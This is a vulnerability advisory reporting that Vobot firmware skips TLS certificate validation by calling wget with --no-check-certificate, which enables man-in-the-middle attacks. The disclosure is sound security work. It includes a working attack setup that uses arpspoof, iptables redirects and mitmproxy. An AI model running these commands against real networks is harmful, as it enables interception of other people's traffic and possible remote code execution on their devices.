6. February 2018 - Thomas Roth - firstname.lastname@example.org
CVS: 10.0 Critical
This vulnerability has been confirmed to be exploitable. The vulnerability will potentially be published after 60 days or after a patch for the vulnerability has been released.
It was found that the Vobot firmware does not validate the certificates of the web-services it connects to. This allows an attacker to conduct TLS man-in-the-middle attacks that can compromise the users privacy and can be used to potentially gain remote code execution on the device.
In the firmware itself it was found that GNU Wget, a software package for retrieving files using HTTP and other protocols, is often invoked with the parameter
--no-check-certificate, which explicitely disables certificate validation.
All HTTPS connections need to verify the authenticity of the host they are connecting to.
An attacker on the same network can conduct a man-in-the-middle attack using arp-spoofing. By then using a transparent proxy such as
mitmproxy it is possible to intercept and modify all requests to the different servers and the Vobot client.
Example attack setup:
export VOBOT_IP=... # e.g. 192.168.0.5 export GATEWAY_IP=... # e.g. 192.168.0.1 export INTERFACE=... # e.g. wlan0 sysctl -w net.ipv4.ip_forward=1 iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080 # In separate terminals: arpspoof -i $INTERFACE -t $VOBOT_IP $GATEWAY_IP >/dev/null & arpspoof -i $INTERFACE -t $GATEWAY_IP $VOBOT_IP >/dev/null & mitmproxy -T --host